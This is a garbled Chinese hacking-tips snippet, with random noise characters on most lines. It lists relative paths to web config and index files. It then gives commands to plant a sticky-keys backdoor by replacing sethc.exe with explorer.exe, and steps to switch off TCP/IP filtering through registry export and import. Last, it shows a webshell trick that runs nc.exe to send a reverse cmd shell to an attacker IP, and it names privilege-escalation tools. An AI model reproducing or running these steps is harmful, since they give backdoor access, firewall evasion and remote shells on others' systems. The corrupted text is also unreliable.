./inc/config.inc.php! L* \* `, N) ^6 ^8 Z) T4 l
../../inc/config.inc.php
/ e @- R$ s7 P* q1 g../inc/config.inc.php
! t' L( W0 m5 k../../../inc/config.inc.php
% C4 T# @! G* E- @6 |/index.php2 v6 X* [1 U/ X
./index.php/ H6 p7 H* O7 d
../../index.php6 e" e S8 q8 O3 A p
../index.php
- g# Y5 E+ W% T( G( T5 p/ v$ J../../../index.php# R" @ Y+ K9 O9 Y; ~! w6 j
/index.asp& R) B1 o1 ]+ v T
./index.asp8 [' r1 h* f' W- B' G* D' S$ n5 t" j
../../index.asp
, D! j$ @/ P1 _7 L2 v../index.asp2 e- x+ O7 v6 Z
../../../index.asp4 v% k9 n& M$ m/ Q; r1 E
替换SHIFT后门
; c- z. ] F- _ attrib c:\windows\system32\sethc.exe -h -r -s
1 X; Z9 d- ]+ p) Z( }/ a7 w
& h% [" k) h1 c8 |& B1 g attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
; J/ |1 C+ @( L S% x+ ?+ s e2 u" t6 A) X! d0 X
del c:\windows\system32\sethc.exe
) b) P3 U6 r) H, @6 _. p( A: k) a7 V
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe- c1 X+ b" p9 |
, _! A7 e- Z5 B6 x+ [( ~
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
! h j7 U. L" Q# |! g7 R5 ?& L' H
1 N3 k6 @3 h8 \% u6 P) M3 h attrib c:\windows\system32\sethc.exe +h +r +s
8 v' ^$ j( r! Q. d5 E% t7 E+ d5 Z# o- Y. t8 R( i
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
- z% P2 j. X( p* k$ X去除TCPIP筛选
& F3 C, l ^6 M- q! r) V7 L" _TCP/IP筛选在注册表里有三处,分别是: 5 h" x5 V3 e# `* a
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip ' V& ^0 j* \3 t# W
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip 5 i+ A9 I0 R) n" W1 V5 X6 x0 I
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip ! s: w# ~* C2 V$ l5 Q
9 K( n. I* H: E* r* _
分别用
/ ?# [/ N! ~! K; E0 Y4 a: X* \- _3 xregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 A: d8 q! G, @, B$ s& a( V: aregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) x# e* i# w& C" Qregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip . h0 t& C0 H; A1 X" ^* w: I
命令来导出注册表项 1 S" }7 c5 L- |- U: q# r a, C
$ r7 X' Q2 }* p+ c3 g3 }然后把 三个文件里的EnableSecurityFilters"=dword:00000001,改成EnableSecurityFilters"=dword:00000000
& z% t$ M/ n4 l% N& X. e, n* k4 T+ O2 B" x2 [' @
再将以上三个文件分别用 1 X p9 y& D1 ^& {# X5 T4 u
regedit -s D:\a.reg
* W4 L l0 G4 e, z, n. j n, ?regedit -s D:\b.reg " x! X* e0 J, j9 h `7 f. N$ |
regedit -s D:\c.reg . |$ P. K5 h. t* y. I
导入注册表即可 / Y, G! v) l( M
* n* j7 H7 I) o2 U8 I* f
webshell提权小技巧
( e9 J5 e r' t& Y& Mcmd路径:
0 K7 A% N3 N z5 n, V, n- sc:\windows\temp\cmd.exe( t, D( D8 D; W5 Q7 {
nc也在同目录下
, L5 {/ T1 @! N2 p, ?8 | t( L( c0 A例如反弹cmdshell:- h6 @1 q" N6 `% k
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"9 \+ D$ A" w$ m1 p# B7 [5 m: |: y
通常都不会成功。
! q; Y, o. n( ]* o
, J5 b& q* I$ Y% V" E) t而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
' l1 L5 b9 Y; M: _" z命令输入 -vv ip 999 -e c:\windows\temp\cmd.exe. o/ r; i& m# j% }
却能成功。。
$ O1 \+ E# N8 C这个不是重点! e" C! T; Z$ g- M1 T8 B5 ?) @
我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功 |